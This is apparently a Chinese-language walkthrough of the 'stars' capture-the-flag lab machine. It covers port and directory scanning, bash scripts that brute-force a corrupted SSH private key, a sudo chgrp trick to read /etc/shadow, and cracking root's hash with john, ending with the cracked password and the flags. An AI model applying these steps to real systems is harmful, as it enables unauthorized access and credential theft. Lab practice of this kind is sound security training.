stars

C0rr3ct發表於2024-05-30

⏲️ Release Date // 2021-10-20

✔️ MD5 // f9f5956724247267946fce4d78ac1e4e

☠ Root // 117

💀 User // 115

主機探測和nmap掃描

全埠掃描

nmap -sT --min-rate 8000 -p- 192.168.56.128

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

指定埠掃描

nmap -sT -sV -sC -O -p22,80 192.168.56.128

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
|   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Cours PHP & MySQ

web滲透

訪問web頁面

Under construction...

but not empty

目錄掃描

gobuster dir -u http://192.168.56.128 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt

/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/sshnote.txt          (Status: 200) [Size: 117]

訪問/sshnote.txt

My RSA key is messed up, it looks like 3 capital letters have been replaced by stars.
Can you try to fix it?

sophie

發現一個人名sophie,告訴我們id_rsa的三個大寫字母被*代替

檢視cookie

cG9pc29uZWRnaWZ0LnR4dA==

base64解碼得到poisonedgift.txt

訪問得到私鑰,發現三個字母沒了

image-20240528221147993

爆破key

生成三個大寫字母的組合

crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > capital.txt

#!/bin/bash

KEYS4DIRECTORY=keys
LETTERS=capital.txt
CORRUPT_KEY=id_rsa

mkdir -p $KEYS4DIRECTORY

for i in $(cat $LETTERS);do
echo $i
clear
sed "s/\*\*\*/$i/" $CORRUPT_KEY > $KEYS4DIRECTORY/$i.rsa
done;

登入ssh服務

#!/bin/bash

KEYS4DIRECTORY=keys
LETTERS=capital.txt

echo 設定許可權
chmod 600 $KEYS4DIRECTORY/*

echo 檢查key

for i in $(ls -1 $KEYS4DIRECTORY/*); do
ssh -i $i sophie@192.168.56.128
echo $i
done

sophie@debian:~$ cat user.txt 
a99ac9055a3e60a8166cdfd746511852

sophie@debian:~$ sudo -l
Matching Defaults entries for sophie on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sophie may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/chgrp

提權

chgrp可以修改目錄和檔案的所屬組

將shadow檔案改為sophie組

sudo chhgrp sophie /etc/shadow

爆破root的hash

root:$1$root$dZ6JC474uVpAeG8g0oh/7.:18917:0:99999:7:::

john hash --wordlist=/usr/share/wordlists/rockyou.txt

root:barbarita:18917:0:99999:7:::

提權成功,拿到root.txt

root@debian:~# cat root.txt 
bf3b0ba0d7ebf3a1bf6f2c452510aea2

相關文章